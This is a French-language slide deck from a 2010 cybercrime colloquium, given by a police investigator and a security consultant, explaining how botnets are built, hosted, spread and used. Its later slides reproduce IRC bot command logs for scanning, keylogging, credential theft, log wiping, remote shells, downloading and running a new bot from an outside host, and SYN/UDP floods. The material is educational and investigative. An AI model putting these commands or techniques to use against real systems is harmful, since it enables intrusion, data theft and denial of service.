1. Les Botnets
Colloque sur la cybercriminalité
Avril 2010
1

2. Alain Rioux, CISSP
• Sergent spécialiste, MVDI, BCEDI,
Sûreté du Québec, depuis 2005
• Certifications CISSP, GREM
• Certificat en informatique, ULaval
• « Operation Basique »
• Microsoft LETech 2006‐2008
• Gold ILECA 2008, Bangkok, Thaïlande
• Polytechnique, SANS (mentorat)
• Développeur
2

3. Michel Cusin, CISSP
• Consultant en sécurité, Bell Canada
• Mentor/instructeur SANS Institute
• Certifications CISSP, CEH, GCIH, OPST,
etc…
• Site cusin.ca
3

4. Les Botnets
Serveur de commande
Suspect
Bot Bot Bot Bot Bot
4

5. Les Botnets
• Le programme de bot
• Création d’un bot
• Infrastructure du botnet
• La propagation
• Autres types de bot
• Commandes diverses
• Utilisation du botnet
5

6. Le programme
• Code source compilé en exécutable (.exe)
• Les grandes familles :
– Agobot/Phatbot/ForBot/XtremBot
– SdBot/Rbot/UrBot/RxBot/UrxBot/JrBot
• Intègre le ver et le robot IRC
• Peut se retrouver sous différentes variantes (Ex.
NZM, RoseBot, Ruffbot, etc.)
6

7. Création
• Les étapes :
– Code source récupéré sur Internet ou autre moyen
– Configuration
– Compilation
– Compression/Chiffrement
– Test
7

8. Création
• Code source
• Configuration
– Fichier de configuration
• Ex. StBot (Stable Bot) 1.0
– Générateur de configuration
• Ex. Agobot
• Compilation
– Ex. MS Visual Studio, GCC, etc.
8

9. Création
• Générateur d’exécutable
www.megasecurity.org
9

10. Création
• Packing : Compression/Chiffrement
– Réduire la taille de l’exécutable
– Éviter la détection par les anti‐virus
– Protéger le code contre la rétro‐ingénierie
• Outil : le packer
• Ex. UPX, Armadillo, PECompact, RLPack,
Neolite, Morphine, Themida, PELock, etc.
10

11. Création
11

12. Test
• Antivirus en ligne (multi‐moteurs)
– www.virustotal.com
– virusscan.jotti.org
– www.novirusthanks.org
– virus‐trap.org
– www.virscan.org
– www.viruschief.com
– www.filterbit.com
12

13. 13

14. Infrastructure
• Serveur de commande et contrôle
– Type : IRC, HTTP, P2P, etc.
– Hébergement
– Adresse IP ou nom de domaine
• Hébergement des ressources (programme de
bots pour les mises à jour)
• Si nom de domaine, enregistrement et DNS
14

15. Infrastructure
• Type de serveur
– IRC
• Simple, rapide, documentée et disponibilité
• Moins convivial (ligne de commande), Pare‐feu
• Ex. UnRealIRCd, BewareIRCd, Ultimate, InspIRCd, etc.
– HTTP
• Port 80 (Pare‐feu), Convivial (GUI en HTML)
– P2P
• Décentralisé
15

16. Infrastructure
16

17. Infrastructure
17
Source : securitylabs.websense.com

18. Source : pandasecurity.com
Infrastructure
18

19. Infrastructure
• Hébergement
– Un ordinateur du pirate ou un ami
– Un serveur IRC existant (Ex. Undernet)
– Un serveur dédié (payé frauduleusement ou non)
– Un bot performant (serveur ou non)
– Une grappe de bots performants (cluster)
• Hébergement des ressources
– Fournisseurs gratuits (iquebec.com, voila.fr,
freewebs.com, etc.) 19

20. Infrastructure
• DNS
– DNS dynamique : un domaine, une adresse IP variable :
ex.No‐IP.org, dyndns.com, yi.org, etc.
– DNS Round Robbin (un domaine, plusieurs adresses IP
choisies en alternance)
– DNS Netmaskordering (Comme RR, mais avec priorité basée
sur la comparaison des masques)
N.B. : Le nom de domaine pointe directement sur le serveur de
commande et contrôle. Ceci représente le point le plus
vulnérable du botnet. Solution : Le Fast‐Flux. 20

21. Fast‐flux
Single‐Flux
Source : www.xmcopartners.com 21

22. Fast‐flux
Double‐flux
Source : www.xmcopartners.com 22

23. Infrastructure
• Encore plus loin : Web 2.0 Botnet
– Twitter
– Facebook
– Google/Ajax
– Etc.
23

24. Propagation
• Deux activités : Balayage (scan) et Infection
• Dans un bot traditionnel, c’est le ver qui
accomplit ces tâches, il peut être autonome ou
semi‐autonome
• Il recherche une ou plusieurs vulnérabilités (Ex.
DCOM, SMB, ASN, VNC, etc.)
• Démonstration : Autonome
24

25. Autonome
25

26. Autonome
26

27. Semi‐autonome
Scan 24.72.x.x -> Bot 24.72.130.224
Faille x
Bot
24.72.130.225
Suspect Faille x présente
Serveur de commande
Bot
24.72.130.226
Bot
27

28. Semi‐autonome
Bot
Bot Bot : 24.72.130.225
Suspect
Serveur de commande
Bot
Bot
28

29. Semi‐autonome
Commande de balayage :
Pirate!kktr@Longueuil‐A31682EC.mc.videotron.ca TOPIC #botnet : .advscan asn1smb 75 5 0 201.4.x.x
Balayage commandé et infection automatique :
CAN|XP|SP1|00|2633|W|548!eabt@142‐217‐78‐77.telebecinternet.net PRIVMSG #botnet :FTP File transfer
complete: 201.4.134.6 Infection par un autre bot
BRA|XP|SP1|00|1500|W|957!vtpxe@201.4.134.6 JOIN : #botnet Nouveau bot
BRA|XP|SP1|00|1500|W|957!vtpxe@201.4.134.6 PRIVMSG #botnet : [SCAN]: Random Port Scan started on
201.4.x.x:445 with a delay of 5 seconds for 0 minutes using 75 threads.
CAN|XP|SP1|00|2633|W|548!eabt@142‐217‐78‐77.telebecinternet.net PRIVMSG #botnet :FTP File transfer
complete: 201.4.136.102
BRA|XP|SP0|00|3066|W|771!vbf@201.4.136.102 JOIN : #botnet
BRA|XP|SP0|00|3066|W|771!vbf@201.4.136.102 PRIVMSG #botnet : [SCAN]: Random Port Scan started on
201.4.x.x:445 with a delay of 5 seconds for 0 minutes using 75 threads.
29

30. Vulnérabilités
Statistiques d’infection :
<@Pirate> .stats
<CAN|XP|SP1|00|2633|W|548> [SCAN]: Exploit Statistics: Dcom135: 0, Dcom445: 0, Dcom1025: 0, asn1http: 0,
asn1smb: 4625, asn1smbnt: 0, vnc: 0, netapi: 0, sym: 0, Total: 4625
Balayage VNC (faille authbypass) :
<@Pirate> .asc vnc 100 5 200 170.x.x.x ‐s
<[F]CZE|765771811> ‐ Vnc ‐ trying to root 170.123.234.19 ‐ nopass ;) ‐
<BRA|137791145> ‐ Vnc ‐ 170.123.213.191 ‐ password ‐:12345
<ESP|37523> ‐ Vnc ‐ 170.126.235.164 ‐ password ‐:12345
<[F]POL|962379907> ‐ Vnc ‐ 170.126.165.91 ‐ password ‐:123456
30

31. Autres types
• Autres types de bots
– IRC Bot
– « Web » Bot
– Autres outils
31

32. Le IRC Bot
• Robot IRC convertit en méchant Robot
– Exemple de Robot IRC : Eggdrop, Windrop,
EnergyMech (Emech), Cygmech, WinMech, Darkbot,
etc.
• Modifications : Furtivité, Porte dérobée, etc.
• Pas de ver intégré
• Installation « à la main »
• Démonstration : Eggdrop 32

33. Le Web Bot
• Créé avec les nouveaux langages du Web : Java,
PHP, ASP, Perl, etc.
• Ciblent précisément les serveurs Web
– Exemples :
• W32.Storm.Worm (2001)
• PHP Bot
33

34. PHP Bot
• Bot écrit en PHP
• Exploite le RFI
34

35. Autres outils
• BNC ou bouncer : plus qu’un proxy IRC, permet de
maintenir une connexion permanente. Ex. PsyBNC
• Vhost : Avec BNC ou HostServ
35

36. Conclusion
• Conséquences et utilisations des botnets
– Perturbation des communications : volontaire
(flood) ou involontaire (consommation de
ressources comme les pourriels)
– Perturbation des systèmes : Infection virale, coût
en ressources humaines et matériels (ex. antivirus)
– Fraude au clic : régies publicitaires, concours, etc.
– Warez : vol de licences, hébergement sur les bots
– Web Defacement et méfaits : attaques DDoS
36

37. Conclusion
– Vol d’identité de masse : pstore, sniffer, keylogger,
accès aux fichiers
– Hameçonnage : hébergement du faux site, serveur
SMTP pour les pourriels, obtention d’accès sur des
sites bancaires
– Extorsion : menace d’utilisation du botnet
– Espionnage et vol de données
– Cyberterrorisme
– Cyberguerre
37

38. Source : 38
www.nytimes.com

39. Conclusion
• À venir
– La prévention
– La détection
– L’éradication (décontamination)
– L’investigation
– La mise en accusation et la condamnation
39

40. Questions ?
Encore plus...
Liste de commandes
Avec exemples
40

41. Commandes
• Informations sur l’hôte : ordinateur, système
d’exploitation, paramètres réseau, liste de processus,
base de registre, etc.
• Informations sur le bot : uptime, installation, version,
liste des contrôleurs, threads, etc.
• Déplacements : clônage, joindre ou quitter une
chambre, se reconnecter, etc.
• Démarrer un service : serveur HTTP, FTP, IRC, SMTP,
proxy, etc.
41

42. Commandes
• Espionnage et vol de données : liste des fenêtres
actives, capture d’écran, utiliser la webcam, parcours
du système de fichiers, vol des licences, keylogger,
sniffer, pstore, etc.
• Entretien du système : session distante, effacer les
logs, enlever les autres bots, télécharger une mise à
jour, etc.
• Attaques et fraudes : attaques DDoS, fraudes au clic
42

43. Commandes
Informations système :
<@Pirate> [00|TWN|XP|SP0]‐277701 .si
<[00|TWN|XP|SP0]‐277701> ‐ sysinfo ‐ CPU : 1600MHz. RAM : 1,048,048KB total, 1,048,048KB free.
Disk : 20,482,840KB total, 2,578,028KB free. OS : Windows XP (5.1, Build 2600). Sysdir : D:WINDOWSSystem32
Hostname : guiltpun‐x5q2g9 (170.125.200.173). Current User : guiltpunish. Date : 20:Feb:2008. Time : 10:05:26.
Uptime : 0d 1h 12m.
<@Pirate> ‐uname
<zlw281> Linux somebot1.com 2.6.19.2 #2 SMP Sun Jan 14 04:15:38 CET 2007 i686 Linux
<reg279> FreeBSD somebot2.com 6.2‐STABLE FreeBSD 6.2‐STABLE #0: Tue Jan 23 12:44:26 IRKT 2007
root@v23.ispsystem.net:/usr/obj/usr/src/sys/ISPSYSTEM i386 FreeBSD
Informations réseau :
<@Pirate> .ni
<[00|USA|1821> [ NETINFO ] [Connection Type]: LAN (LAN Connection). [Internal IP]: 129.93.231.166. [External
IP]: 125.103.251.136. [Hostname]: somebot..edu. [Private]: No.[Country]: United States.[Speedtest]: Upload:
92.56 KB/s, Download: 144.35 KB/s.[Bandwidth]: Downloaded: 767MB, Uploaded: 798MB.
43

44. Commandes
Liste de processus :
<@Pirate> .ps list
<[P24|USA|44184]> [PROC] Process List:
<[P24|USA|44184]> 144 ‐ 60 K ‐ "SystemRootSystem32smss.exe"
<[P24|USA|44184]> 168 ‐ 1,660 K ‐ "??C:WINNTsystem32csrss.exe"
<[P24|USA|44184]> 188 ‐ 2,860 K ‐ "??C:WINNTsystem32winlogon.exe"
<[P24|USA|44184]> 216 ‐ 3,076 K ‐ "C:WINNTsystem32services.exe"
<[P24|USA|44184]> 228 ‐ 1,440 K ‐ "C:WINNTsystem32lsass.exe"
<[P24|USA|44184]> 404 ‐ 2,008 K ‐ "C:WINNTsystem32svchost.exe"
...
<[P24|USA|44184]> 8256 ‐ 2,112 K ‐ "C:Program FilesInternet Exploreriexplore.exe"
<[P24|USA|44184]> 8976 ‐ 13,020 K ‐ "C:Program FilesMSN Messengermsnmsgr.exe"
<[P24|USA|44184]> 4088 ‐ 3,696 K ‐ "C:winntsystem32minimech.exe"
<[P24|USA|44184]> [PROC] End of list.
44

45. Commandes
Base de registre :
<@Pirate> .reg query HKLM SoftwareMicrosoftWindowsCurrentVersionRun
<[D01|ISR|86665]> (03) SoftwareMicrosoftWindowsCurrentVersionRunIntec Drivers32 (REG_SZ)
<[D01|ISR|86665]> (04) SoftwareMicrosoftWindowsCurrentVersionRunIntec Service Drivers (REG_SZ)
<[D01|ISR|86665]> (05) SoftwareMicrosoftWindowsCurrentVersionRunNeroCheck (REG_SZ)
...
<[D01|ISR|86665]> [ REG ] Done with query: HKLMSoftwareMicrosoftWindowsCurrentVersionRun
Threads du bot :
<@Pirate> .t
<ie4[hax]‐311> [ Worms SDThreads ]
<ie4[hax]‐311> 0: Main thread
<ie4[hax]‐311> 1: Firewall/AntiVirus/Exe Killer Mood By Pirate
<ie4[hax]‐311> 2: Keys logging to C:WINNTsystem32system.dll
<ie4[hax]‐311> 3: NTScan
<ie4[hax]‐046> 4: [Keylogger] logging to #botnet‐keylog
<ie4[hax]‐046> 5: [HTTPD] Server listening on port: 8080 root dir: c:
45
<ie4[hax]‐311> [ Worm SPYThreads ]

46. Commandes
Durée de vie (uptime) :
<@Pirate> .up
<[P16|GBR|48359]> [ MAIN ] Uptime: 16 days 14:52, Record Uptime: 30 days 06:54.
Date de l’installation :
<@Pirate> .it
<[P20|USA|82515]> [ MAIN ] Bot Installer Sur: 06/20/2006, 08:15 PM.
Information sur le bot :
<@Pirate> !version
<ilgw845> pHp bOt v1
Liste de contrôleurs (login) :
<@Pirate> .who
<[P12|USA|18490]> [ MAIN ] Login List:
<[P12|USA|18490]> <0> Pirate!user@username.users.undernet.org
<[P12|USA|18490]> [ MAIN ] Login List complete. 46

47. Commandes
Clônage :
<@Pirate> .clone us.undernet.org 6667 #botnet ‐s
<BEL|87258> ‐ clones ‐ Created on us.undernet.org:6667, in channel #botnet.
Joindre une chambre :
<@Pirate> .join #botnet2
* Joins: ie[hax]‐3690 (~iehax‐51@dhcp‐0‐8‐a1‐10‐32‐76.cpe.beld.net)
Quitter une chambre :
<@Pirate> .part #botnet2
* Parts: ie3[hax]‐690 (~ie3hax‐6@modemcable035.85‐37‐24.mc.videotron.ca)
Se reconnecter :
<@Pirate> .reconnect
* Quits: USA|46263 (~xwyqy@adsl‐68‐92‐219‐167.dsl.hstntx.swbell.net) (Quit: reconnecting)
* Quits: USA|07769 (iogcvdu@cpe‐74‐76‐81‐213.nycap.res.rr.com) (Quit: reconnecting)
47

48. Commandes
Démarrer un serveur :
<@Pirate> .httpd 8080 c:
<ie[hax]‐0724> [ HTTPD ] Server commencer sur http://somebot1.com:8080
<[04]ax]‐9323> [ HTTPD ] Server commencer sur http://somebot2.com:8080
Démarrer un proxy :
<@Pirate> .redirect 9696 Oslo1.NO.EU.undernet.org 6666
<h4ck3d‐005> TCP Redirect created on port 9696 to Oslo1.NO.EU.undernet.org:6666.
<h4ck3d‐033> TCP Redirect created on port 9696 to Oslo1.NO.EU.undernet.org:6666.
Liste des fenêtres actives :
<@Pirate> .aw
<ie2[hax]‐317> Fenetre active: Multicam Surveillance System 7.0.
<ie3[hax]‐778> Fenetre active: VoyagesDestination ‐ www.voyagesdestination.com ‐ Mozilla Firefox.
<[30]hax]‐216> Fenetre active: Windows Live Hotmail ‐ Microsoft Internet Explorer.
<ie4[hax]‐109> Fenetre active: NOD32 Scanner ‐ [Mi perfil].
<ie3[hax]‐743> Fenetre active: iTunes. 48

49. Commandes
Lister les disques :
<@Pirate> .di
<[00|USA|4272> [DRIVES] Listing drives:
<[00|USA|4272> Disk Drive (C:), total: 244,196,000KB, free: 233,507,040KB, available: 233,507,040KB.
<[00|USA|4272> Disk Drive (D:), total: 244,196,000KB, free: 243,979,700KB, available: 243,979,700KB.
<[00|USA|4272> Cdrom Drive (E:): Failed to stat, device not ready.
<[00|USA|4272> Drive Totals (N/A), total: 488,392,000KB, free: 477,486,740KB, available: 477,486,740KB.
<[00|USA|4272> [DRIVES] End of list.
Capture d’écran :
<@Pirate> .sc c:desktop.gif
<ie4[hax]‐046> Screen capture saved to c:desktop.gif.
Utiliser la webcam :
<@Pirate> .ckeckcam
<ie3[hax]‐976> [WebCAM On] Asti de cochon que jte voille pas mespionner le cul
49

50. Commandes
Vol de licences :
<@Pirate> .cdkeys
<Wo|rM‐663> Microsoft Windows Product ID CD Key: (55194‐640‐0013789‐26509).
<Wo|rM‐663> [CDKEYS]: Recherche Completer.
Protected Storage Data (Internet Explorer) :
<@Pirate> .pstore
<[D01|ISR|86665]> [ PSTORE ] IE Auto‐Complete: http://somesite1.com/, usager:motdepasse
<[D01|ISR|86665]> [ PSTORE ] IE Auto‐Complete: http://somesite2.com/somepage.php, usager:motdepasse
Reniflage de paquets (sniffing) :
<@Pirate> .sniffer
<[00|ESP|855685]> [ SNIFFER ] Started packet sniffer.
<[00|ESP|855685]> IRC sniff "210.84.47.226:2402" to "66.54.229.120:1863": ‐ « ... »
<[00|ESP|855685]> HTTP sniff « 197.56.16.12:80" to "210.84.47.226:2501": ‐ « ... »
50

51. Commandes
Enregistreur de clavier (keylogging) :
<@Pirate> .keylog #botnet‐keylog
<[05]ax]‐3480> [Keylogger] Started (logging to: #botnet‐keylog)
<[05]ax]‐3480> (MSN Hotmail ‐ Nouveau message ‐ Microsoft Internet Explorer): ... ( Return )
<[05]ax]‐3480> (Courrier :: Bienvenue à Agora ‐ Microsoft Internet Explorer): ..[TAB]...[TAB][TAB] ( Return )
<ie3[hax]‐808> (Solutions en ligne ‐ AccèsD ‐ Microsoft Internet Explorer): .... (Changed window)
Effacer les logs :
<@Pirate> „x47x49x96
<[02|CAN|2142> ‐=[ BOT ]=‐ Cleared 3/3 event logs.
<@Pirate> „x42x40x8Fx57x13x86xB9x22
<[02|CAN|2142> ‐=[ BOT ]=‐ DNS cache flushed.
<@Pirate> „x42x40x8Fx57x13x83xA5x21
<[02|CAN|2142> ‐=[ BOT ]=‐ ARP cache flushed.
51

52. Commandes
Session en ligne de commande :
<@Pirate> .opendos
<ie[hax]‐069> [[1]CMD[1]] Active
<ie[hax]‐069> Microsoft Windows 2000 [Version 5.00.2195]
<ie[hax]‐069> (C) Copyright 1985‐2000 Microsoft Corp.
<ie[hax]‐069> Z:>
<@Pirate> .cmd dir
<ie[hax]‐069> dir
<ie[hax]‐069> Volume in drive Z is System
<ie[hax]‐069> Volume Serial Number is 1234‐35BB
<ie[hax]‐069> Directory of Z:
<ie[hax]‐069> 04/12/2006 09:39a <DIR> .
<ie[hax]‐069> 04/12/2006 09:39a <DIR> ..
... [Liste des fichiers] ...
<ie[hax]‐069> 194 File(s) 23,236,499 bytes
<ie[hax]‐069> 52 Dir(s) 20,903,641,088 bytes free
<ie[hax]‐069> Z:>
52

53. Commandes
« Killer » les autres bots :
<@Pirate> .pl
<ie4[hax]‐548> [System Process] System SMSS.EXE CSRSS.EXE WINLOGON.EXE SERVICES.EXE LSASS.EXE
svchost.exe ccSetMgr.exe ccEvtMgr.exe SPBBCSvc.exe spoolsv.exe DWRCS.EXE svchost.exe NPFMntor.exe
regsvc.exe mstask.exe MSupdate.exe WinMgmt.exe svchost.exe explorer.exe DWRCST.EXE nero.exe iexplore.exe
WININET.EXE ccApp.exe svchostt.exe inkjet.exe sounds.exe iexplore.exe svchostt.exe sounds.exe symlcsvc.exe
wuauclt.exe
<@Pirate> .kp svchostt.exe
Télécharger un nouveau bot :
<@Pirate> .download http://membres.lycos.fr/pirate/winsys.exe winsys.exe 1
<[21][F]RoSe444271> downloading http://membres.lycos.fr/pirate/winsys.exe...
<[21][F]RoSe444271> downloaded 72.9 kb to winsys.exe @ 72.9 kb/sec.
<[21][F]RoSe444271> opened winsys.exe.
53

54. Commandes
Fraude au clic ‐ Régies Publicitaires :
<@Pirate> @open http://pirate.somesite.com/ Page contenant publicité
<[2]ujfgpzgmkjb> file opened.
<[2]sciuvmymwf> file opened.
Synflood :
<@Pirate> !syn 24.212.36.215 113 50
<[21]USA|760760273> [SYN]: Flooding: (24.212.36.215:113) for 50 seconds.
<[5]USA|084308781> [SYN]: Flooding: (24.212.36.215:113) for 50 seconds.
<[21]USA|760760273> SYN// Done with flood (35KB/sec).
<[5]USA|084308781> SYN// Done with flood (129KB/sec).
<@Pirate> .ddosbox 208.114.100.12
<ie[hax]‐4108> DrDos Random Ack/Synflooding [208.114.100.12] for 50 seconds
<ie[hax]‐9284> DrDos Random Ack/Synflooding [208.114.100.12] for 50 seconds
<ie[hax]‐4108> Done with DrDos Random Ack/Syn flood [18KB/sec]
<ie[hax]‐9284> Done with DrDos Random Ack/Syn flood [480KB/sec]
54

55. Commandes
UDP :
<@Pirate> !udp 202.106.133.140 0 99999999
<ux766> Udp send to 202.106.133.140 delays 99999999 seconds
<dodh546> Udp send to 202.106.133.140 delays 99999999 seconds
<mmj996> Udp send to 202.106.133.140 delays 99999999 seconds
<@Pirate> .wisdom.udp 159.171.175.141 2048 4096 50
<USA|949449114> ‐ wisdom(udp) ‐ Sending packets to 159.171.175.141...
<[33][F]BRA|015201859> ‐ wisdom(udp) ‐ Sending packets to 159.171.175.141...
Ping :
<@Pirate> .ping 24.122.166.215 1000 4096 100
<DEU|24523> ‐ ping ‐ Sending 1000 pings to 24.122.166.215. packet size: 4096, timeout: 100(ms).
<CAN|64836> ‐ ping ‐ Sending 1000 pings to 24.122.166.215. packet size: 4096, timeout: 100(ms).
55

56. Commandes
IRC Message Flood :
<@Pirate> ‐insult SomeUser Un autre usager IRC
<Oimec4945> (SomeUser) You are so stupid you couldn't pour piss out of a boot if the instructions were written
on the bottom of the heel.
<__mech‐__> (SomeUser) There's nothing wrong with you that a miracle couldn't cure...
<PaNaDooLa> (SomeUser) For a minute there I didn't recognize you. It was the happiest minute of my life.
<IrcL3aDeR> (SomeUser) Do YOU ever get tired of having yourself around?
Une chambre, ex.. #montreal
<@Pirate> !privmsg #montreal POUHAHAHAHAHAHAHAHAHAHAHAHAHAPOUHAHAHAHAHAHAHAHAHAHAHAHA
HAPOUHAHAHAHAHAHAHAHAHAHAHAHAHAPOUHAHAHAHAHAHAHAHAHAHAHAHAHAPOUHAHAHAHAHAHAHA
HAHAHAHAHAHAPOUHAHAHAHAHAHAHAHAHAHAHAHAHAPOUHAHAHAHAHAHAHAHAHAHAHAHAHAPOUHAHA
HAHAHAHAHAHAHAHAHAHAHA
56

57. Les Botnets
Colloque sur la cybercriminalité
Mai 2010
57